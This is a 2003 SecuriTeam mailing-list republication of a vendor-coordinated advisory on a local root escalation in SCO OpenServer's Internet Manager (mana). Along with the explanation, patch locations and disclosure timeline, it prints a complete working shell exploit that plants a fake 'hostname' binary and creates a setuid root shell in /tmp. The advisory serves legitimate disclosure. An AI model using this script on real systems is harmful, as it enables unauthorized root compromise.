[UNIX] SCO Internet Manager Allows Local Users to Gain Root Level Privileges

From: SecuriTeam (support_at_securiteam.com)
Date: 09/17/03

  • Next message: SecuriTeam: "[EXPL] Remote rpc.mountd Exploit for xlog() Vulnerability" 
    To: list@securiteam.com
Date: 17 Sep 2003 15:38:24 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      SCO Internet Manager Allows Local Users to Gain Root Level Privileges
    ------------------------------------------------------------------------

    SUMMARY

    A vulnerability in the SCO Internet Manager (mana) allows local attackers
    to gain root privileges by redirecting certain environment variables to a
    shell binary.

    DETAILS

    Vulnerable systems:
     * OpenServer version 5.0.5 up to version 5.0.7

    The SCO Internet Manager (mana) is designed to be run via the ncsa_httpd
    on port 615 and it is password protected.

    However, running /usr/internet/admin/mana/mana locally is possible.

    By exporting the environment variable REMOTE_ADDR and setting it to
    127.0.0.1, mana can be tricked to execute the file menu.mana as if it was
    run via the nsca_httpd password protected area.

    Another interesting environment variable is PATH_INFO that tells mana what
    mana file should be executed.

    This tells us that mana will execute "hostname" when this file is run. By
    changing the environment variables PATH_INFO to /pass-err.mana and PATH to
    /:$PATH would make mana execute ./hostname with root privileges.

    The file pass-err.mana contains the following lines:

      <TCL>
      if {[catch {exec hostname} hostName] != 0} {
          set hostName localhost
      }
      set mana(localHostName) $hostName
      return {}
      </TCL>

    This tells us that mana will execute "hostname" when this file is run.

    By changing the environment variables PATH_INFO to /pass-err.mana and PATH
    to ./:$PATH would make mana execute ./hostname with root privileges.

    Example (Simple POC):
    This proof of concept for OpenServer 5.0.7 should give any local user
    euid=0(root).

    $ uname -a
    SCO_SV openserv 3.2 5.0.7 i386
    $ id
    uid=200(test) gid=50(group) groups=50(group)
    $ sh mana-root.sh
    # id
    uid=200(test) gid=50(group) euid=0(root) groups=50(group)

    Exploit mana-root.sh:
    #!/bin/sh
    #
    # OpenServer 5.0.7 - Local mana root shell
    #
    #

    REMOTE_ADDR=127.0.0.1
    PATH_INFO=/pass-err.mana
    PATH=./:$PATH

    export REMOTE_ADDR
    export PATH_INFO
    export PATH

    echo "cp /bin/sh /tmp;chmod 4777 /tmp/sh;" > hostname

    chmod 755 hostname

    /usr/internet/admin/mana/mana > /dev/null

    /tmp/sh

    Workaround:
    The proper solution is to install the latest packages.

    Location of fixed binaries:
    <ftp://ftp.sco.com/pub/updates/OpenServer/CSSA-2003-SCO.19>
    ftp://ftp.sco.com/pub/updates/OpenServer/CSSA-2003-SCO.19.

    Installing fixed binaries:
    Upgrade the affected binaries with the following sequence:

    1) Download the VOL* files to the /tmp directory

    2) Run the custom command, specify an install from media images, and
    specify the /tmp directory as the location of the images.

    Disclosure Timeline:
    9/02/2003: Vendor notified by e-mail
    9/03/2003: Vendor has verified the issue and is working on the solution
    9/15/2003: Public release

    ADDITIONAL INFORMATION

    The original advisory can be downloaded from:
    <http://www.texonet.com/advisories/TEXONET-20030902.txt>
    http://www.texonet.com/advisories/TEXONET-20030902.txt.

    The information has been provided by <mailto:advisories@texonet.com>
    Texonet.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

  • Next message: SecuriTeam: "[EXPL] Remote rpc.mountd Exploit for xlog() Vulnerability"

    Relevant Pages

    • [NT] Multiple Vendor Insecure use of CreateProcess()
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Improper use of Windows API command CreateProcess allows attackers to ... until a module is encountered to execute. ... This creates a scenario whereby arbitrary code could be executed. ...
      (Securiteam)
    • [NT] Switch Off Multiple Vulnerabilities
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Stack-based Buffer Overflow: ... execute arbitrary code on the remote system - possibly with SYSTEM ... boundaries until the ecx register reaches zero (where the ecx was the ...
      (Securiteam)
    • [NEWS] URL Parsing and Plain Text Password disclosure in Best Buy Employee Toolkit Software
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... entered in the URL area and an attacker could use this to execute a local ... command shell or execute other programs locally stored. ... Store's central server. ...
      (Securiteam)
    • [UNIX] Open Webmail Remote Command Execution (userstat.pl)
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... A remote attacker can run arbitrary commands with the web ... The vulnerability was discovered in an obsolete script named userstat.pl ... commands an attacker would want to execute. ...
      (Securiteam)
    • [UNIX] xloadimage Multiple Vulnerabilities (Buffer Overflow, Command Execution)
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... to execute arbitrary commands via malformed images. ... Multiple buffer overflow in xloadimage allow remote attackers to execute ... Under Linux the buffer overflows allow remote attackers to execute ...
      (Securiteam)